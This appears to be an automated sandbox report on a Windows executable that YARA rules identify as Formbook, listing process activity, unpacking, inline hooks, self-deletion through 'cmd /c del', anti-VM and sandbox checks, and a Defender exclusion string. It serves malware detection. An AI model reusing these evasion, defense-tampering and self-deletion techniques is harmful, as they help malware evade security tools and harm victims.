Source: GiG35Rwmz6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: GiG35Rwmz6.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@4/2

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GiG35Rwmz6.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01

Source: GiG35Rwmz6.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: GiG35Rwmz6.exe	Virustotal: Detection: 40%
Source: GiG35Rwmz6.exe	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'	Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: GiG35Rwmz6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: GiG35Rwmz6.exe

Static file information: File size 1116672 > 1048576

Source: GiG35Rwmz6.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe, 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe
Source:	Binary string: help.pdbGCTL source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
Source:	Binary string: help.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Unpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Unpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_003C5097 push ss; retf	0_2_003C50A0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_003C4AEA push ebx; retf	0_2_003C4B11
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C8069A push FFFFFFBAh; retf	0_2_00C8069C
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82DCF push ecx; retf	0_2_00C82DD1
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82DD9 push ecx; retf	0_2_00C82DDB
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F3523A pushfd ; ret	0_2_09F35245
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041E041 pushfd ; iretd	4_2_0041E051
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_004170CB push edi; ret	4_2_004170CC
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D0D2 push eax; ret	4_2_0041D0D8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D0DB push eax; ret	4_2_0041D142
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D085 push eax; ret	4_2_0041D0D8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00416888 push FFFFFFFAh; ret	4_2_00416890
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D13C push eax; ret	4_2_0041D142
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00416C3E push ecx; retf	4_2_00416C3F
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041DD3C push cs; ret	4_2_0041DD3D
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041DD82 push ebp; retf	4_2_0041DD83
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00417628 push ds; iretd	4_2_0041762B
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00435097 push ss; retf	4_2_004350A0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00434AEA push ebx; retf	4_2_00434B11
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ADD0D1 push ecx; ret	9_2_02ADD0E4
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242E041 pushfd ; iretd	9_2_0242E051
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_024270CB push edi; ret	9_2_024270CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D0D2 push eax; ret	9_2_0242D0D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D0DB push eax; ret	9_2_0242D142
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D085 push eax; ret	9_2_0242D0D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02426888 push FFFFFFFAh; ret	9_2_02426890
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D13C push eax; ret	9_2_0242D142
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02427628 push ds; iretd	9_2_0242762B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02426C3E push ecx; retf	9_2_02426C3F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242DD3C push cs; ret	9_2_0242DD3D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242DD82 push ebp; retf	9_2_0242DD83

Source: initial sample

Static PE information: section name: .text entropy: 7.56086895782

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE7

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GiG35Rwmz6.exe PID: 6564, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000024198E4 second address: 00000000024198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002419B5E second address: 0000000002419B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Code function: 4_2_00409A90 rdtsc

4_2_00409A90

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe TID: 6568	Thread sleep time: -103004s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe TID: 6592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6664	Thread sleep time: -58000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 6552	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Thread delayed: delay time: 103004			Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000005.00000000.703640273.000000000FC60000.00000004.00000001.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&]
Source: explorer.exe, 00000005.00000000.698881312.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.698916741.000000000A64D000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.693172351.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.698881312.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.718413023.0000000004791000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Lo==
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.718312976.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.699012653.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.699084380.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

